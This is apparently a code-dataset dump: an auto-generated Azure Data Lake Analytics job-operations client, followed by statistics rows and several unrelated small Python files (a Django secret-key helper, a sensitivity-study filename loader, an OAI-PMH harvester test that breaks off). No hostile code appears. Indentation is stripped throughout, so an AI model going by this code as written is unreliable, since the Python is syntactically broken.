:rtype: ~azure.mgmt.datalake.analytics.job.models.JobInformation or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'CreateJobParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create.metadata = {'url': '/jobs/{jobIdentity}'}
def get(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
"""Gets the job information for the specified job ID.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: JobInfo ID.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobInformation or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobInformation or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/jobs/{jobIdentity}'}
def _update_initial(
self, account_name, job_identity, parameters=None, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.update.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
if parameters is not None:
body_content = self._serialize.body(parameters, 'UpdateJobParameters')
else:
body_content = None
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, account_name, job_identity, parameters=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates the job information for the specified job ID. (Only for use
internally with Scope job type.).
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param parameters: The parameters to update a job.
:type parameters:
~azure.mgmt.datalake.analytics.job.models.UpdateJobParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns JobInformation or
ClientRawResponse<JobInformation> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.datalake.analytics.job.models.JobInformation]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.datalake.analytics.job.models.JobInformation]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_initial(
account_name=account_name,
job_identity=job_identity,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update.metadata = {'url': '/jobs/{jobIdentity}'}
def get_statistics(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
"""Gets statistics of the specified job.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job Information ID.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobStatistics or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobStatistics or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_statistics.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobStatistics', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_statistics.metadata = {'url': '/jobs/{jobIdentity}/GetStatistics'}
def get_debug_data_path(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
"""Gets the job debug data information specified by the job ID.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobDataPath or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobDataPath or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_debug_data_path.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobDataPath', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_debug_data_path.metadata = {'url': '/jobs/{jobIdentity}/GetDebugDataPath'}
def _cancel_initial(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.cancel.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def cancel(
self, account_name, job_identity, custom_headers=None, raw=False, polling=True, **operation_config):
"""Cancels the running job specified by the job ID.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._cancel_initial(
account_name=account_name,
job_identity=job_identity,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
cancel.metadata = {'url': '/jobs/{jobIdentity}/CancelJob'}
def _yield_method_initial(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.yield_method.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def yield_method(
self, account_name, job_identity, custom_headers=None, raw=False, polling=True, **operation_config):
"""Pauses the specified job and places it back in the job queue, behind
other jobs of equal or higher importance, based on priority. (Only for
use internally with Scope job type.).
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._yield_method_initial(
account_name=account_name,
job_identity=job_identity,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
yield_method.metadata = {'url': '/jobs/{jobIdentity}/YieldJob'}
def build(
self, account_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Builds (compiles) the specified job in the specified Data Lake
Analytics account for job correctness and validation.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param parameters: The parameters to build a job.
:type parameters:
~azure.mgmt.datalake.analytics.job.models.BuildJobParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobInformation or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobInformation or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.build.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'BuildJobParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
build.metadata = {'url': '/buildJob'}
| 46.561662
| 157
| 0.663164
| 3,885
| 34,735
| 5.736422
| 0.07722
| 0.026025
| 0.019384
| 0.029077
| 0.856502
| 0.847124
| 0.830028
| 0.813515
| 0.795881
| 0.792426
| 0
| 0.003804
| 0.243184
| 34,735
| 745
| 158
| 46.624161
| 0.843959
| 0.296531
| 0
| 0.757033
| 0
| 0
| 0.124798
| 0.040886
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.015345
| 0
| 0.12532
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0204e80840bd71bab0eb10f6170715ca6c1c6c5b
| 170
|
py
|
Python
|
api/secret_key.py
|
dima7a14/FamilyBudget-api
|
871947b40c47a62198b9a5d6c524ee6d4fc93088
|
[
"MIT"
] | null | null | null |
api/secret_key.py
|
dima7a14/FamilyBudget-api
|
871947b40c47a62198b9a5d6c524ee6d4fc93088
|
[
"MIT"
] | 1
|
2021-04-08T19:28:42.000Z
|
2021-04-08T19:28:42.000Z
|
api/secret_key.py
|
dima7a14/FamilyBudget-api
|
871947b40c47a62198b9a5d6c524ee6d4fc93088
|
[
"MIT"
] | null | null | null |
from django.core.management.utils import get_random_secret_key
def generate_secret_key():
"""Generates secret key for django."""
return get_random_secret_key()
| 24.285714
| 62
| 0.776471
| 24
| 170
| 5.166667
| 0.625
| 0.290323
| 0.241935
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135294
| 170
| 6
| 63
| 28.333333
| 0.843537
| 0.188235
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
0289d1ec39be67c7780e2ec30f1215fbf70cc875
| 71
|
py
|
Python
|
tests/test_decorer_ruuvi_v3.py
|
jollierfinbean/bleak_ruuvitag
|
617ace8a3c06eb013b890a7f7c5de0beb90925a5
|
[
"MIT"
] | null | null | null |
tests/test_decorer_ruuvi_v3.py
|
jollierfinbean/bleak_ruuvitag
|
617ace8a3c06eb013b890a7f7c5de0beb90925a5
|
[
"MIT"
] | null | null | null |
tests/test_decorer_ruuvi_v3.py
|
jollierfinbean/bleak_ruuvitag
|
617ace8a3c06eb013b890a7f7c5de0beb90925a5
|
[
"MIT"
] | null | null | null |
from .context import bleak_ruuvitag
def test_create():
pass # TODO
| 17.75
| 35
| 0.746479
| 10
| 71
| 5.1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183099
| 71
| 4
| 36
| 17.75
| 0.87931
| 0.056338
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
5a2a7f477511eabb8cfc95db9fc80985b57bd116
| 4,448
|
py
|
Python
|
SensitivityStudy/LoadSensitivityStudyFileNames.py
|
Lucciola111/stream_autoencoder_windowing
|
5456b07bd20220c987598db2cdb832d8195e1575
|
[
"MIT"
] | 4
|
2021-09-16T05:50:25.000Z
|
2021-12-31T07:04:55.000Z
|
SensitivityStudy/LoadSensitivityStudyFileNames.py
|
Lucciola111/stream_autoencoder_windowing
|
5456b07bd20220c987598db2cdb832d8195e1575
|
[
"MIT"
] | null | null | null |
SensitivityStudy/LoadSensitivityStudyFileNames.py
|
Lucciola111/stream_autoencoder_windowing
|
5456b07bd20220c987598db2cdb832d8195e1575
|
[
"MIT"
] | 1
|
2021-12-16T06:53:08.000Z
|
2021-12-16T06:53:08.000Z
|
def load_sensitivity_study_file_names(design):
"""
Parameters
----------
design: Name of design
Returns experiment files names of a design
-------
"""
file_names = {}
if design == 'NAE-IAW':
path = '../Files_Results/Sensitivity_Study/NAE-IAW/'
file_names['FILE_MeanDrift_var0.01'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.01_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-10_10.32.pickle_2021-08-24_12.30_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MeanDrift_var0.05'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.05_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.42.pickle_2021-08-24_14.36_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MeanDrift_var0.25'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.25_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.45.pickle_2021-08-24_17.24_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_VarianceDrift'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyVarianceDrift_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_11.15.pickle_2021-08-24_20.58_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MeanVarianceDrift_all_broken'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_50DR_100Dims_100MinDimBroken_300MinL_2000MaxL_2021-08-06_10.54.pickle_2021-08-24_13.34_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MeanVarianceDrift'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.53.pickle_2021-08-24_16.22_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_RandomRBF_Generator'] = 'Sensitivity_Study_RandomRandomRBF_50DR_100Dims_50Centroids_1MinDriftCentroids_300MinL_2000MaxL_2021-08-06_10.57.pickle_2021-08-24_13.20_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_MergedStream'] = 'Sensitivity_Study_Mixed_300MinDistance_DATASET_A_RandomNumpyRandomNormalUniform_DATASET_B_RandomRandomRBF.pickle_2021-08-24_13.08_10ITERATIONS_fitNewAETrue_fitFalse'
file_names['FILE_FashionMNIST'] = 'Sensitivity_Study_RandomMNIST_and_FashionMNIST_SortAllNumbers19DR_2021-08-06_11.07.pickle_2021-08-25_12.07_10ITERATIONS_fitNewAETrue_fitFalse'
if design == 'RAE-IAW':
path = '../Files_Results/Sensitivity_Study/RAE-IAW/'
file_names['FILE_MeanDrift_var0.01'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.01_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-10_10.32.pickle_2021-08-11_19.36_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MeanDrift_var0.05'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.05_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.42.pickle_2021-08-12_00.04_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MeanDrift_var0.25'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyMeanDrift_var0.25_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.45.pickle_2021-08-12_14.18_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_VarianceDrift'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_onlyVarianceDrift_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_11.15.pickle_2021-08-12_18.04_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MeanVarianceDrift_all_broken'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_50DR_100Dims_100MinDimBroken_300MinL_2000MaxL_2021-08-06_10.54.pickle_2021-08-12_20.47_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MeanVarianceDrift'] = 'Sensitivity_Study_RandomNumpyRandomNormalUniform_50DR_100Dims_1MinDimBroken_300MinL_2000MaxL_2021-08-06_10.53.pickle_2021-08-13_00.30_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_RandomRBF_Generator'] = 'Sensitivity_Study_RandomRandomRBF_50DR_100Dims_50Centroids_1MinDriftCentroids_300MinL_2000MaxL_2021-08-06_10.57.pickle_2021-08-12_19.37_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_MergedStream'] = 'Sensitivity_Study_Mixed_300MinDistance_DATASET_A_RandomNumpyRandomNormalUniform_DATASET_B_RandomRandomRBF.pickle_2021-08-13_03.54_10ITERATIONS_fitNewAEFalse_fitTrue'
file_names['FILE_FashionMNIST'] = 'Sensitivity_Study_RandomMNIST_and_FashionMNIST_SortAllNumbers19DR_2021-08-06_11.07.pickle_2021-08-12_22.40_10ITERATIONS_fitNewAEFalse_fitTrue'
return path, file_names
| 111.2
| 239
| 0.859712
| 545
| 4,448
| 6.425688
| 0.168807
| 0.058252
| 0.066819
| 0.083952
| 0.910337
| 0.90691
| 0.813821
| 0.776128
| 0.739577
| 0.739577
| 0
| 0.164053
| 0.068121
| 4,448
| 39
| 240
| 114.051282
| 0.68082
| 0.021583
| 0
| 0
| 0
| 0
| 0.84113
| 0.813803
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5a3c38e4ef396a2e6f8a0d851b558b41e7143157
| 4,575
|
py
|
Python
|
tests/test_uk.py
|
Semtexcz/invenio-oarepo-oai-pmh-harvester
|
2866c7d7355f6885b4f443ee1e82baa24502b36e
|
[
"MIT"
] | null | null | null |
tests/test_uk.py
|
Semtexcz/invenio-oarepo-oai-pmh-harvester
|
2866c7d7355f6885b4f443ee1e82baa24502b36e
|
[
"MIT"
] | null | null | null |
tests/test_uk.py
|
Semtexcz/invenio-oarepo-oai-pmh-harvester
|
2866c7d7355f6885b4f443ee1e82baa24502b36e
|
[
"MIT"
] | null | null | null |
from invenio_nusl_theses.proxies import nusl_theses
from invenio_oarepo_oai_pmh_harvester.models import OAIProvider
from invenio_db import db
from invenio_oarepo_oai_pmh_harvester.synchronization import OAISynchronizer
def test_uk_one_record(app, uk_db, schemas):
uk_provider = OAIProvider.query.filter_by(code="uk").one_or_none()
constant_fields = {
"provider": {"$ref": "http://127.0.0.1:5000/api/taxonomies/institutions/00216208/"},
"accessRights": {"$ref": "http://127.0.0.1:5000/api/taxonomies/accessRights/c_abf2/"},
"accessibility": [{"lang": "cze", "value": "Dostupné v digitálním repozitáři UK."}, {
"lang": "eng", "value": "Available in the Charles University Digital Repository."
}]
}
if not uk_provider:
uk_provider = OAIProvider(
code="uk",
description="Univerzita Karlova",
oai_endpoint="https://dspace.cuni.cz/oai/nusl",
set_="nusl_set",
metadata_prefix="xoai",
constant_fields=constant_fields
)
db.session.add(uk_provider)
db.session.commit()
unhandled_paths = {
"/dc/date/accessioned",
"/dc/date/available",
"/dc/date/issued",
"/dc/identifier/repId",
"/dc/identifier/aleph",
"/dc/description/provenance",
"/dc/description/department",
"/dc/description/faculty",
"/dc/language/cs_CZ",
"/dc/publisher",
"/dcterms/created",
"/thesis/degree/name",
"/thesis/degree/program",
"/thesis/degree/level",
"/uk/abstract",
"/uk/thesis",
"/uk/taxonomy",
"/uk/faculty-name",
